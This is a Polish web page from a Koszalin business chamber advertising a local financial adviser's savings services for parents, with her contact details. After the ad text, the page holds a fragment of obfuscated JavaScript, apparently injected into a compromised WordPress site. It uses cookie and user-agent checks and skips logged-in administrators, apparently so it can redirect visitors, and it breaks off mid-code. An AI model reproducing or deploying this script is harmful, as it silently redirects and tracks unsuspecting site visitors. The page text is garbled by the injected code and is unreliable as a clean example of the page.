Przyszłość Twoich dzieci | Północna Izba Gospodarcza w Koszalinie

O czym myślą rodzice patrząc na swoje małe pociechy?

  • o przyszłości i ich dorosłym życiu
  • o ich potrzebach i priorytetach
  • o spełnianiu ich marzeń i o tym by było lepiej..

Zastanówmy się, co zrobić by zabezpieczyć przyszłość swoją i swojego dziecka ?

Zacznij gromadzić środki już teraz, i bądź dumny ze swojej decyzji.

Odpowiedzialny rodzic – to najlepszy rodzic ‼️

Chcesz wiedzieć więcej    Zapraszam!

Usługi Finansowe

Elżbieta Warzyńska

ul.Kaszubska 12/3

75-036 Koszalin

574-690-649

? biuro@finansowo-koszalin.pl

www.finansowo-koszalin.pl

ZAPRASZAM NA INDYWIDUALNE KONSULTACJE – TO NIC NIE KOSZTUJE 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m